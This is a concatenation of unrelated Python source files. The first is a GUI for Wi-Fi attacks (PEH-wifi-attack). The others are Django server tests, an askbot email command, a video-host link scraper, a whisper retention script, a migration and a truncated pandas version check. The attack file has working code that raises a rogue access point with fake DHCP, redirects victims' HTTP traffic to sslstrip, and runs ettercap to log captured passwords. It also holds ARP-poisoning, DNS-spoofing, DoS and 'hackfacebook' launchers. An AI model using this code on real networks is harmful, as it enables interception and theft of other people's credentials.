        self.form2.addRow(self.btn_start_attack, self.btn_cancelar)
        # Log listbox shown under the buttons.
        self.listbox = QListWidget(self)
        self.listbox.setFixedHeight(200)
        self.form2.addRow(self.listbox)
        self.Main.addLayout(self.form)
        self.Main.addLayout(self.grid)
        self.Main.addLayout(self.form2)
        self.setLayout(self.Main)
    # --- PEH-toolkit launchers -------------------------------------------
    # Each wrapper guards on an entry of self.m (presence of an external
    # binary probed in intGUI) before spawning the console tool in xterm.
    # NOTE(review): the self.m index used by each guard does not obviously
    # match the tool being launched — verify the intended mapping.
    def start_tutorial(self):
        if self.m[1] != False:
            system("sudo xterm -geometry 80x45-1+250 tutorial ")
    def start_ping(self):
        if self.m[1] != False:
            system("sudo xterm -geometry 80x25-1+250 ping ")
    def start_whois(self):
        if self.m[2] != False:
            system("sudo xterm -geometry 80x25-1+250 PEHwhois")
    def start_dork3r(self):
        if self.m[1] != False:
            system("sudo xterm -geometry 80x25-1+250 dork3r")
    def start_sqlmap(self):
        if self.m[4] != False:
            system("sudo xterm -geometry 80x25-1+250 PEHsqlmap")
    def start_hackfacebook(self):
        if self.m[1] != False:
            system("sudo xterm -geometry 80x25-1+250 facebook")
    def start_wifite(self):
        if self.m[2] != False:
            system("sudo xterm -geometry 80x25-1+250 wifite")
    def start_apf(self):
        if self.m[1] != False:
            system("sudo xterm -geometry 80x25-1+250 APF")
    def start_nmap(self):
        if self.m[4] != False:
            system("sudo xterm -geometry 80x25-1+250 PEHnmap")
    def start_theharvester(self):
        if self.m[1] != False:
            system("sudo xterm -geometry 80x25-1+250 PEHtheharvester")
    def start_fierce(self):
        if self.m[4] != False:
            system("sudo xterm -geometry 80x25-1+250 PEHfierce")
    def start_footprint(self):
        if self.m[4] != False:
            system("sudo xterm -geometry 80x25-1+250 footprint")
    def start_xerxes(self):
        if self.m[4] != False:
            system("sudo xterm -geometry 80x25-1+250 xerxes")
    # --- Module sub-windows ----------------------------------------------
    def show_update(self):
        self.n = frm_Update()
        self.n.show()
    def show_arp_posion(self):
        self.n = frm_Arp_Poison()
        self.n.setGeometry(0, 0, 450, 300)
        self.n.show()
    def show_settings(self):
        self.n = frm_Settings()
        self.n.show()
    def show_windows_update(self):
        self.n = frm_update_attack()
        self.n.setGeometry(QRect(100, 100, 450, 300))
        self.n.show()
    def show_dnsManager(self):
        self.n = frm_dnsspoof()
        self.n.setGeometry(QRect(100, 100, 450, 200))
        self.n.show()
    def show_dhcpDOS(self):
        self.n = frm_dhcp_main()
        self.n.setGeometry(QRect(100, 100, 450, 200))
        self.n.show()
    def showProbe(self):
        self.p = frm_PMonitor()
        self.p.setGeometry(QRect(100, 100, 350, 200))
        self.p.show()
    def newwindow(self):
        self.w = frm_window()
        self.w.setGeometry(QRect(100, 100, 200, 200))
        self.w.show()
    def form_mac(self):
        self.w = frm_mac_generator()
        self.w.setGeometry(QRect(100, 100, 300, 100))
        self.w.show()
    def form_list(self):
        self.w = frm_GetIP()
        self.w.setGeometry(QRect(100, 100, 450, 300))
        self.w.show()
    def refrash_interface(self):
        '''Re-scan network interfaces and refill the wlan combo box.'''
        self.w.clear()
        n = self.mod_import.placa()
        for i,j in enumerate(n):
            if search("wlan", j):
                self.w.addItem(n[i])
    def kill(self):
        '''Stop the attack: undo iptables/monitor setup and kill xterms.'''
        nano = ["echo \"0\" > /proc/sys/net/ipv4/ip_forward","iptables --flush", "iptables --table nat --flush" ,\
        "iptables --delete-chain", "iptables --table nat --delete-chain", \
        "airmon-ng stop wlan0mon && airmon-ng stop wlan1mon && airmon-ng stop wlan2mon" , "rm Settings/confiptables.sh" , \
        "ifconfig lo down","ifconfig at0 down &"]
        for delete in nano:
            system(delete)
        self.listbox.clear()
        system("killall xterm")
        QMessageBox.information(self,"Clear Setting", "Log CLear success ")
        system("clear")
    # --- External MITM tool launchers ------------------------------------
    def start_etter(self):
        if self.m[1] != False:
            system("sudo xterm -geometry 73x25-1+50 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w passwords -i lo & ettercapid=$!")
    def start_ssl(self):
        if self.m[2] != False:
            system("sudo xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -k -l 10000 & sslstripid=$!")
    def start_dns(self):
        if self.m[1] != False:
            system("sudo xterm -geometry 73x25-1+250 -T DNSSpoof -e ettercap -P dns_spoof -T -q -M arp // // -i lo & dnscapid=$!")
    def start_dift(self):
        if self.m[4] != False:
            system("sudo xterm -geometry 75x15+1+200 -T DriftNet -e driftnet -i lo & driftnetid=$!")
    def configure(self):
        '''Write dhcpd.conf and the iptables setup script, then run them.'''
        self.listbox.addItem("{+} Setting dhcpd Server...")
        self.configuradhcp = open("Settings/dhcpd.conf","w")
        self.configuradhcp.write("""authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "%s";
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}"""%(self.input_AP.text()))
        self.listbox.addItem("{+} Configure Network Fake Dhcp...")
        # Install the generated dhcpd.conf, replacing any previous one.
        if path.isfile("/etc/dhcp/dhcpd.conf"):
            system("rm /etc/dhcp/dhcpd.conf")
            move("Settings/dhcpd.conf", "/etc/dhcp/")
        else:
            move("Settings/dhcpd.conf", "/etc/dhcp/")
        self.listbox.addItem("{+} Setting interface lo Network...")
        self.conf_iptables = open("Settings/confiptables.sh", "w")
        self.conf_iptables.write("""echo "[+] Setting iptables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig lo 10.0.0.1 netmask 255.255.255.0
ifconfig lo mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to %s
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface lo -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface %s -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables --table nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination %s
iptables -t nat -A POSTROUTING -j MASQUERADE
echo "[+] Startup DHCP..."
touch /var/run/dhcpd.pid
sudo dhcpd -d -f -cf \"/etc/dhcp/dhcpd.conf\" lo
sleep 3
"""%(self.input_gw.text(),self.w.currentText(),str(self.mod_import.get_ip_local(None))))
        self.conf_iptables.close()
        self.listbox.addItem("{+} Add Getway Interface DNET...")
        self.listbox.addItem("{+} SET POSTROUTING MASQUEREDE...")
        self.listbox.addItem("{+} Add REDIRECT port 10000 Iptables...")
        self.listbox.addItem("{+} IPtables Set with success...")
        system("chmod +x Settings/confiptables.sh")
        system("xterm -geometry 75x15+1+250 -e 'bash -c \"./Settings/confiptables.sh; exec bash\"' & configure=$!")
        self.configuradhcp.close()
    def start_air(self):
        '''Start the fake access point (airmon-ng + airbase-ng + DHCP).'''
        dot = 1
        self.listbox.clear()
        if self.w.currentText() == "":
            QMessageBox.information(self,"Error", "Network interface not supported :(")
        else:
            if path.exists("Settings/"):
                print(":::")
                if not geteuid() == 0:
                    QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
                    dot = 0
            else:
                mkdir("Settings")
                dot = 0
        # NOTE(review): when no interface is selected, dot stays 1 and the
        # attack still runs with an empty interface name — confirm intent.
        if dot == 1:
            system("airmon-ng start %s" %(self.w.currentText()))
            self.listbox.addItem("{+} Start airmon-ng %s"%self.w.currentText())
            system("sudo xterm -geometry 75x15+1+0 -T \"Fake AP - %s - Statup\" -e airbase-ng -c %s -e \"%s\" %s & fakeapid=$!"""%(self.interface,self.input_canal.text(),self.input_AP.text(),self.interface))
            sleep(5)
            self.configure()
            self.listbox.addItem("{+} Done")
    def Edit_etter(self):
        '''Open etter.dns in nano (Ubuntu/Debian paths only).'''
        n = dist()
        if n[0] == "Ubuntu":
            system("xterm -e nano /etc/ettercap/etter.dns")
        elif n[0] == "debian":
            system("xterm -e nano /etc/ettercap/etter.dns")
        else:
            QMessageBox.information(self,"Error", "Path etter.dns not found")
    def create_sys_tray(self):
        '''Install the system-tray icon and its activation handler.'''
        self.sysTray = QSystemTrayIcon(self)
        self.sysTray.setIcon(QIcon('rsc/icon.jpg'))
        self.sysTray.setVisible(True)
        self.connect(self.sysTray, SIGNAL("activated(QSystemTrayIcon::ActivationReason)"), self.on_sys_tray_activated)
        self.sysTrayMenu = QMenu(self)
        act = self.sysTrayMenu.addAction("FOO")
    def on_sys_tray_activated(self, reason):
        # 3 == Trigger (single click), 2 == DoubleClick.
        if reason == 3:
            self.showNormal()
        elif reason == 2:
            self.showMinimized()
    def about(self):
        '''Show the About dialog built from the module metadata.'''
        QMessageBox.about(self, self.tr("About PEH-wifi-attack"),
        self.tr(
        "Author:%s\n"
        "Version:%s\n"
        "The MIT License (MIT)\n"
        "Emails of the Author: \np0cL4bs@gmail.com\n"
        "mh4root@gmail.com\n\n"
        "edited_by:%s\n"
        "edited_version:%s\n"
        "edited_date:%s\n"
        "Emails: \nhackerbolt@outlook.com\n"
        "hackerbolt@hotmail.com\n\n"
        "Portuguese Ethical Hacker Academy (PEH)\n"
        "Copyright(c) 2015\n"% ( __author__, __version__, __edited_by__, __edited_version__, __edited_date__ )))
| hackerbolt-freelancer/PEH-wifi-attack | Core/Main.py | Python | mit | 21,924 |
# -*- encoding: utf-8 -*-
"""
Tests for django.core.servers.
"""
from __future__ import unicode_literals
import os
import socket
from django.core.exceptions import ImproperlyConfigured
from django.test import LiveServerTestCase
from django.test.utils import override_settings
from django.utils.http import urlencode
from django.utils.six.moves.urllib.error import HTTPError
from django.utils.six.moves.urllib.request import urlopen
from django.utils._os import upath
from .models import Person
# Filesystem root of this test package; media/static fixtures live beside it.
TEST_ROOT = os.path.dirname(upath(__file__))
# Settings overridden for the lifetime of each live-server test class
# (enabled/disabled in LiveServerBase.setUpClass/tearDownClass).
TEST_SETTINGS = {
    'MEDIA_URL': '/media/',
    'MEDIA_ROOT': os.path.join(TEST_ROOT, 'media'),
    'STATIC_URL': '/static/',
    'STATIC_ROOT': os.path.join(TEST_ROOT, 'static'),
}
class LiveServerBase(LiveServerTestCase):
    '''Common base for the live-server tests.

    Applies TEST_SETTINGS for the whole class lifetime and provides a
    urlopen() helper that fetches paths from the running live server.
    '''
    available_apps = [
        'servers',
        'django.contrib.auth',
        'django.contrib.contenttypes',
        'django.contrib.sessions',
    ]
    fixtures = ['testdata.json']
    urls = 'servers.urls'
    @classmethod
    def setUpClass(cls):
        # Override settings
        cls.settings_override = override_settings(**TEST_SETTINGS)
        cls.settings_override.enable()
        super(LiveServerBase, cls).setUpClass()
    @classmethod
    def tearDownClass(cls):
        # Restore original settings
        cls.settings_override.disable()
        super(LiveServerBase, cls).tearDownClass()
    def urlopen(self, url):
        # Fetch *url* (a path) from the live server started for this class.
        return urlopen(self.live_server_url + url)
class LiveServerAddress(LiveServerBase):
    """
    Ensure that the address set in the environment variable is valid.
    Refs #2879.
    """
    @classmethod
    def setUpClass(cls):
        # Backup original environment variable
        address_predefined = 'DJANGO_LIVE_TEST_SERVER_ADDRESS' in os.environ
        old_address = os.environ.get('DJANGO_LIVE_TEST_SERVER_ADDRESS')
        # Just the host is not accepted
        cls.raises_exception('localhost', ImproperlyConfigured)
        # The host must be valid
        cls.raises_exception('blahblahblah:8081', socket.error)
        # The list of ports must be in a valid format
        cls.raises_exception('localhost:8081,', ImproperlyConfigured)
        cls.raises_exception('localhost:8081,blah', ImproperlyConfigured)
        cls.raises_exception('localhost:8081-', ImproperlyConfigured)
        cls.raises_exception('localhost:8081-blah', ImproperlyConfigured)
        cls.raises_exception('localhost:8081-8082-8083', ImproperlyConfigured)
        # If contrib.staticfiles isn't configured properly, the exception
        # should bubble up to the main thread.
        old_STATIC_URL = TEST_SETTINGS['STATIC_URL']
        TEST_SETTINGS['STATIC_URL'] = None
        cls.raises_exception('localhost:8081', ImproperlyConfigured)
        TEST_SETTINGS['STATIC_URL'] = old_STATIC_URL
        # Restore original environment variable
        if address_predefined:
            os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = old_address
        else:
            del os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS']
    @classmethod
    def tearDownClass(cls):
        # skip it, as setUpClass doesn't call its parent either
        pass
    @classmethod
    def raises_exception(cls, address, exception):
        '''Assert that starting the live server at *address* raises
        *exception*; always tears the server state back down.'''
        os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = address
        try:
            super(LiveServerAddress, cls).setUpClass()
            raise Exception("The line above should have raised an exception")
        except exception:
            pass
        finally:
            super(LiveServerAddress, cls).tearDownClass()
    def test_test_test(self):
        # Intentionally empty method so that the test is picked up by the
        # test runner and the overridden setUpClass() method is executed.
        pass
class LiveServerViews(LiveServerBase):
    """HTTP behaviour of the live test server: 404s, views, static/media."""
    def test_404(self):
        """
        Ensure that the LiveServerTestCase serves 404s.
        Refs #2879.
        """
        try:
            self.urlopen('/')
        except HTTPError as err:
            self.assertEqual(err.code, 404, 'Expected 404 response')
        else:
            self.fail('Expected 404 response')
    def test_view(self):
        """
        Ensure that the LiveServerTestCase serves views.
        Refs #2879.
        """
        f = self.urlopen('/example_view/')
        self.assertEqual(f.read(), b'example view')
    def test_static_files(self):
        """
        Ensure that the LiveServerTestCase serves static files.
        Refs #2879.
        """
        f = self.urlopen('/static/example_static_file.txt')
        self.assertEqual(f.read().rstrip(b'\r\n'), b'example static file')
    def test_media_files(self):
        """
        Ensure that the LiveServerTestCase serves media files.
        Refs #2879.
        """
        f = self.urlopen('/media/example_media_file.txt')
        self.assertEqual(f.read().rstrip(b'\r\n'), b'example media file')
    def test_environ(self):
        # Non-ASCII query strings must reach the WSGI environ percent-encoded.
        f = self.urlopen('/environ_view/?%s' % urlencode({'q': 'тест'}))
        self.assertIn(b"QUERY_STRING: 'q=%D1%82%D0%B5%D1%81%D1%82'", f.read())
class LiveServerDatabase(LiveServerBase):
    """Database visibility between the test thread and the live server (#2879)."""
    def test_fixtures_loaded(self):
        """Fixture data must be visible to the live server thread."""
        response = self.urlopen('/model_view/')
        self.assertEqual(response.read().splitlines(), [b'jane', b'robert'])
    def test_database_writes(self):
        """Rows written by a live-server view must be readable from the test."""
        self.urlopen('/create_model_instance/')
        people = Person.objects.all().order_by('pk')
        self.assertQuerysetEqual(
            people,
            ['jane', 'robert', 'emily'],
            lambda person: person.name
        )
| atruberg/django-custom | tests/servers/tests.py | Python | bsd-3-clause | 5,773 |
import datetime
from django.core.management.base import NoArgsCommand
from django.conf import settings as django_settings
from askbot import models
from askbot import const
from askbot.conf import settings as askbot_settings
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
from askbot import mail
from askbot.utils.classes import ReminderSchedule
from askbot.skins.loaders import get_template
from django.template import Context
# When True, reminder emails are printed to stdout instead of being sent.
DEBUG_THIS_COMMAND = False
class Command(NoArgsCommand):
    """Send "accept the best problem" reminder emails (legacy Python 2 code).

    For every non-blocked user, finds their recent exercises that have
    problems but no accepted problem, and emails a reminder according to
    the configured ReminderSchedule.
    """
    def handle_noargs(self, **options):
        # Bail out early if the relevant email features are disabled.
        if askbot_settings.ENABLE_EMAIL_ALERTS == False:
            return
        if askbot_settings.ENABLE_ACCEPT_PROBLEM_REMINDERS == False:
            return
        #get exercises without problems, excluding closed and deleted
        #order it by descending added_at date
        schedule = ReminderSchedule(
            askbot_settings.DAYS_BEFORE_SENDING_ACCEPT_PROBLEM_REMINDER,
            askbot_settings.ACCEPT_PROBLEM_REMINDER_FREQUENCY,
            askbot_settings.MAX_ACCEPT_PROBLEM_REMINDERS
        )
        # Candidate exercises: not deleted, inside the reminder window,
        # have at least one problem but no accepted one, newest first.
        exercises = models.Post.objects.get_exercises().exclude(
            deleted = True
        ).added_between(
            start = schedule.start_cutoff_date,
            end = schedule.end_cutoff_date
        ).filter(
            thread__problem_count__gt = 0
        ).filter(
            thread__accepted_problem__isnull=True #problem_accepted = False
        ).order_by('-added_at')
        #for all users, excluding blocked
        #for each user, select a tag filtered subset
        #format the email reminder and send it
        for user in models.User.objects.exclude(status = 'b'):
            user_exercises = exercises.filter(author = user)
            final_exercise_list = user_exercises.get_exercises_needing_reminder(
                activity_type = const.TYPE_ACTIVITY_ACCEPT_PROBLEM_REMINDER_SENT,
                user = user,
                recurrence_delay = schedule.recurrence_delay
            )
            #todo: rewrite using query set filter
            #may be a lot more efficient
            exercise_count = len(final_exercise_list)
            if exercise_count == 0:
                continue
            subject_line = _(
                'Accept the best problem for %(exercise_count)d of your exercises'
            ) % {'exercise_count': exercise_count}
            #todo - make a template for these
            if exercise_count == 1:
                reminder_phrase = _('Please accept the best problem for this exercise:')
            else:
                reminder_phrase = _('Please accept the best problem for these exercises:')
            data = {
                'site_url': askbot_settings.APP_URL,
                'exercises': final_exercise_list,
                'reminder_phrase': reminder_phrase
            }
            template = get_template('email/accept_problem_reminder.html')
            body_text = template.render(Context(data))
            # In debug mode only print the message; otherwise send it.
            if DEBUG_THIS_COMMAND:
                print "User: %s<br>\nSubject:%s<br>\nText: %s<br>\n" % \
                    (user.email, subject_line, body_text)
            else:
                mail.send_mail(
                    subject_line = subject_line,
                    body_text = body_text,
                    recipient_list = (user.email,)
                )
| maxwward/SCOPEBak | askbot/management/commands/send_accept_problem_reminders.py | Python | gpl-3.0 | 3,650 |
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# seriesly - XBMC Plugin
# Conector para nowdownload
# http://blog.tvalacarta.info/plugin-xbmc/seriesly/
#------------------------------------------------------------
import urlparse,urllib2,urllib,re
import os
from core import scrapertools
from core import logger
from core import config
def test_video_exists( page_url ):
return True,""
def get_video_url( page_url , premium = False , user="" , password="", video_password="" ):
    """Resolve the direct download URL for a nowdownload page.

    First tries the direct "Download Now" link; if absent, follows the
    token/expiryText flow to reach the "Click here to download" link.
    Returns a list with a single URL. The premium/user/password arguments
    are accepted for interface compatibility and are not used here.
    """
    logger.info("[nowdownload.py] get_video_url (page_url='%s')" % page_url)
    '''
    <a href="http://f02.nowdownload.co/dl/91efaa9ec507ef4de023cd62bb9a0fe2/50ab76ac/6711c9c90ebf3_family.guy.s11e02.italian.subbed.hdtv.xvid_gannico.avi" class="btn btn-danger"><i class="icon-white icon-download"></i> Download Now</a>
    '''
    data = scrapertools.cache_page( page_url )
    logger.debug("[nowdownload.py] data:" + data)
    try:
        url = scrapertools.get_match(data,'<a href="([^"]*)" class="btn btn-danger"><i class="icon-white icon-download"></i> Download Now</a>')
    except:
        #$.get("/api/token.php?token=7e1ab09df2775dbea02506e1a2651883");
        token = scrapertools.get_match(data,'(/api/token.php\?token=[^"]*)')
        logger.debug("[nowdownload.py] token:" + token)
        d= scrapertools.cache_page( "http://www.nowdownload.co"+ token )
        # NOTE(review): the next line searches the original page (`data`),
        # not the token response (`d`) fetched just above -- confirm this is
        # intentional; `d` is otherwise unused.
        url = scrapertools.get_match(data,'expiryText: \'<a class="btn btn-danger" href="([^"]*)')
        logger.debug("[nowdownload.py] url_1:" + url)
        data = scrapertools.cache_page("http://www.nowdownload.co" + url )
        logger.debug("[nowdownload.py] data:" + data)
        #<a href="http://f03.nowdownload.co/dl/8ec5470153bb7a2177847ca7e1638389/50ab71b3/f92882f4d33a5_squadra.antimafia_palermo.oggi.4x01.episodio.01.ita.satrip.xvid_upz.avi" class="btn btn-success">Click here to download !</a>
        url = scrapertools.get_match(data,'<a href="([^"]*)" class="btn btn-success">Click here to download !</a>')
    logger.debug("[nowdownload.py] url_final:" + url)
    video_urls = [url]
    return video_urls
# Encuentra vídeos del servidor en el texto pasado
def find_videos(data):
    """Scan *data* for nowdownload links.

    Returns a list of [title, url, server-id] triples, de-duplicated while
    preserving first-seen order.
    """
    #http://www.nowdownload.co/dl/9gwahc3577hj9
    #http://www.nowdownload.eu/dl/srv4g94wk6j7b
    patronvideos = '(nowdownload.\w{2}/dl/[a-z0-9]+)'
    logger.info("[nowdownload.py] find_videos #"+patronvideos+"#")
    devuelve = []
    encontrados = set()
    for match in re.compile(patronvideos,re.DOTALL).findall(data):
        url = "http://www."+match
        if url in encontrados:
            logger.info(" url duplicada="+url)
            continue
        logger.info(" url="+url)
        devuelve.append( [ "[nowdownload]" , url , 'nowdownload' ] )
        encontrados.add(url)
    return devuelve
| conejoninja/xbmc-seriesly | servers/nowdownload.py | Python | gpl-3.0 | 2,851 |
#!/usr/bin/env python
# @package update_storage_schemas.py
# Correct/Update storage schemas\n
# @code
# # Usage example for update_storage_schemas.py
# sudo ./update_storage_schemas.py --path /opt/graphite/whisper --cfg /opt/graphite/conf/schemas
# @endcode
import sys
import os
import logging
import subprocess
import argparse
import re
import time
from multiprocessing import Pool, cpu_count
from configobj import ConfigObj
# Assuming Python 2, we'll want scandir if possible, it's much faster
try:
from scandir import scandir
except ImportError:
from os import listdir as scandir
# Root logger for the whole script; verbosity is raised in __main__ if --debug.
LOG = logging.getLogger()
LOG.setLevel(logging.INFO)
# Maps pattern string -> {'retentions': ..., 'match': compiled regex};
# populated by config_schemas().
SCHEMA_LIST = {}
# The very basic default retentions
DEFAULT_SCHEMA = {'match': re.compile('.*'),
                  'retentions': '1m:7d'}
# Runtime flags and root path; overwritten from the CLI options in __main__.
DEBUG = False
DRY_RUN = False
ROOT_PATH = ""
def config_schemas(cfg):
    """Load a storage-schemas.conf file into the module-level schema tables.

    The catch-all '.*' rule replaces DEFAULT_SCHEMA's retentions; every
    other rule is stored in SCHEMA_LIST keyed by its (un-anchored) pattern.
    """
    for _name, rule in ConfigObj(cfg).items():
        pattern = rule['pattern']
        retentions = rule['retentions']
        if pattern == '.*':
            DEFAULT_SCHEMA['retentions'] = retentions
            continue
        # Strip a leading anchor so the pattern can be used with re.search.
        if pattern[0] == '^':
            pattern = pattern[1:]
        SCHEMA_LIST[pattern] = {'retentions': retentions,
                                'match': re.compile(pattern)}
def _convert_seconds(time):
seconds_dict = {'s': 1, 'm': 60, 'h': 3600, 'min': 60,
'd': 86400, 'w': 604800, 'y': 31536000}
(points, time) = time.split(':')
if str.isalpha(time[-1]):
time = int(time[:-1]) * seconds_dict[time[-1]]
return time
def _compare_retention(retention, tmp_path):
    """Return True if the whisper file at *tmp_path* already has *retention*.

    Runs whisper-info.py on the file and compares its per-archive
    'retention: N' lines (total seconds per archive) against the configured
    schema converted by _convert_seconds().
    """
    # Convert each configured element to its total time span in seconds.
    new_retention = [_convert_seconds(item) for item in list(retention)]
    info_string = [INFO_BIN, tmp_path]
    cur_ret_list = subprocess.Popen(info_string, stdout=subprocess.PIPE)
    cur_ret_list = cur_ret_list.communicate()[0].split('\n')
    # NOTE(review): assumes whisper-info.py prints lines like
    # 'retention: 604800' for every archive, in schema order -- confirm
    # against the installed whisper version.
    cur_retention = [int(line.split(':')[1]) for line in cur_ret_list
                     if 'retention' in line]
    return cur_retention == new_retention
def _find_metrics(path):
for f in scandir(path):
if f.is_dir(follow_symlinks=False):
for sf in _find_metrics(f.path):
yield sf
else:
if not f.is_file(follow_symlinks=False) or \
not f.name.endswith('.wsp'):
continue
yield f.path
def fix_metric(metric):
    """Resize one whisper file to its configured retention, if it differs.

    Returns a one-element list [(success_bool, metric_path)] so results can
    be flattened by the multiprocessing map in search_and_fix().
    Honours the module-level DEBUG / DRY_RUN flags.
    """
    if not SCHEMA_LIST:
        LOG.error("Didn't initialize schemas!")
        return []
    if DEBUG:
        LOG.info("Testing %s for modification" % metric)
    devnull = open(os.devnull, 'w')
    command_string = list(BASE_COMMAND) + [metric]
    retention = DEFAULT_SCHEMA['retentions']
    # Turn the file path into a dotted metric name for pattern matching.
    matching = metric[len(ROOT_PATH):].replace('/', '.')
    for schema, info in SCHEMA_LIST.iteritems():
        if info['match'].search(matching):
            retention = info['retentions']
            break
    command_string.extend(list(retention))
    if DEBUG:
        LOG.info("Created command: %s" % command_string)
    if _compare_retention(retention, metric):
        LOG.debug('%s has the same retention as before!' % metric)
        return [(False, metric)]
    if DRY_RUN:
        res = 0
    else:
        LOG.debug('Retention will be %s' % retention)
        # record file owner/group and perms to set properly after whisper-resize.py is complete
        st = os.stat(metric)
        if DEBUG:
            res = subprocess.check_call(command_string)
        else:
            res = subprocess.check_call(command_string,
                                        stdout=devnull)
        os.chmod(metric, st.st_mode)
        os.chown(metric, st.st_uid, st.st_gid)
    devnull.close()
    # wait for a second, so we don't kill I/O on the host
    time.sleep(SLEEP)
    """
    We have manual commands for every failed file from these
    errors, so we can just go through each of these errors
    after a completed run. There shouldn't be many
    """
    if res != 0:
        LOG.error('Failed to update schemas for %s' % metric)
        LOG.error('Attempted retention: %s' % retention)
        LOG.error('Attempted command string: %s' % command_string)
        return [(False, metric)]
    else:
        return [(True, metric)]
def search_and_fix(subdir):
    """Fix retentions for every whisper file under ROOT_PATH/subdir.

    Fans fix_metric() out over a process pool (one worker per CPU) in
    chunks of 100 metrics; returns the pool.map results, or None if the
    schemas were never loaded.
    """
    if not SCHEMA_LIST:
        LOG.error("Didn't initialize schemas!")
        return
    fpath = os.path.join(ROOT_PATH, subdir)
    pool = Pool(cpu_count())
    LOG.info('Creating new storage schemas for metrics under %s ...' % fpath)
    results = pool.map(fix_metric, _find_metrics(fpath), 100)
    pool.close()
    pool.join()
    return results
# Parse command line options sent to the script
def cli_opts():
    """Build the command-line parser for this script and parse sys.argv."""
    p = argparse.ArgumentParser(
        "Correct storage settings on multiple whisper files")
    p.add_argument('--cfg', action='store', dest='cfg',
                   help='The storage-schemas.conf file path',
                   required=True)
    p.add_argument('--path', action='store', dest='path',
                   help='The root path to find metrics in',
                   required=True)
    p.add_argument('--debug', action='store_true', dest='debug',
                   help='Display debug information',
                   default=False)
    p.add_argument('--dry-run', action='store_true', dest='dry_run',
                   help="Don't actually do anything",
                   default=False)
    p.add_argument('--subdir', action='store', dest='subdir',
                   help="If you only want to process a particular subdir",
                   default='')
    p.add_argument('--nobackup', action='store_true', dest='nobackup',
                   help="Passed through to whisper-resize.py, don't create a backup",
                   default=False)
    p.add_argument('--aggregate', action='store_true', dest='aggregate',
                   help="Passed through to whisper-resize.py, roll up values",
                   default=False)
    p.add_argument('--bindir', action='store', dest='bindir',
                   help="The root path to whisper-resize.py and whisper-info.py",
                   default='/opt/graphite/bin')
    p.add_argument('--sleep', action='store', dest='sleep',
                   help="Sleep this amount of time in seconds between metric comparisons",
                   default=0.3)
    return p.parse_args()
if __name__ == '__main__':
    i_args = cli_opts()
    # whisper files are typically root-owned; refuse to run otherwise.
    if os.getenv('USER') != 'root':
        print("You must run this script as root!")
        sys.exit(1)
    if i_args.debug:
        LOG.setLevel(logging.DEBUG)
    soh = logging.StreamHandler(sys.stdout)
    LOG.addHandler(soh)
    # Publish the parsed options through the module-level globals that
    # fix_metric()/search_and_fix() read.
    ROOT_PATH = i_args.path
    DEBUG = i_args.debug
    DRY_RUN = i_args.dry_run
    BINDIR = i_args.bindir
    SLEEP = i_args.sleep
    RESIZE_BIN = BINDIR + "/whisper-resize.py"
    INFO_BIN = BINDIR + "/whisper-info.py"
    # Base resize invocation; per-metric path and retentions appended later.
    BASE_COMMAND = [RESIZE_BIN]
    if i_args.nobackup:
        BASE_COMMAND.append('--nobackup')
    if i_args.aggregate:
        BASE_COMMAND.append('--aggregate')
    config_schemas(i_args.cfg)
    search_and_fix(i_args.subdir)
| piotr1212/whisper | contrib/update-storage-times.py | Python | apache-2.0 | 7,256 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Changes the Car model's meta options (name ordering, "Car Setup"
    # verbose name) and adds an optional free-form fixed_setup text field.
    dependencies = [
        ('library', '0004_auto_20160825_1001'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='car',
            options={'ordering': ['name'], 'verbose_name': 'Car Setup'},
        ),
        migrations.AddField(
            model_name='car',
            name='fixed_setup',
            field=models.TextField(help_text=b'Store a fixed setup here if you wish; the contents can be copied from "Documents\\Assetto Corsa\\setups\\<car>\\<track>\\<setup-name>.ini", and pasted here. If you check the "fixed setup" option in your Preset\'s Entries - this fixed setup is applied', null=True, blank=True),
        ),
    ]
| PeteTheAutomator/ACServerManager | library/migrations/0005_auto_20160828_1046.py | Python | mit | 822 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def require_minimum_pandas_version() -> None:
    """Raise ImportError if minimum version of Pandas is not installed"""
    # TODO(HyukjinKwon): Relocate and deduplicate the version specification.
    minimum_pandas_version = "1.0.5"
    from distutils.version import LooseVersion
    try:
        import pandas
    except ImportError as error:
        # pandas is missing entirely.
        raise ImportError(
            "Pandas >= %s must be installed; however, " "it was not found." % minimum_pandas_version
        ) from error
    # pandas is present; verify it is recent enough.
    if LooseVersion(pandas.__version__) < LooseVersion(minimum_pandas_version):
        raise ImportError(
            "Pandas >= %s must be installed; however, "
            "your version was %s." % (minimum_pandas_version, pandas.__version__)
        )
def require_minimum_pyarrow_version() -> None:
    """Raise ImportError if minimum version of pyarrow is not installed"""
    # TODO(HyukjinKwon): Relocate and deduplicate the version specification.
    minimum_pyarrow_version = "1.0.0"
    from distutils.version import LooseVersion
    import os
    try:
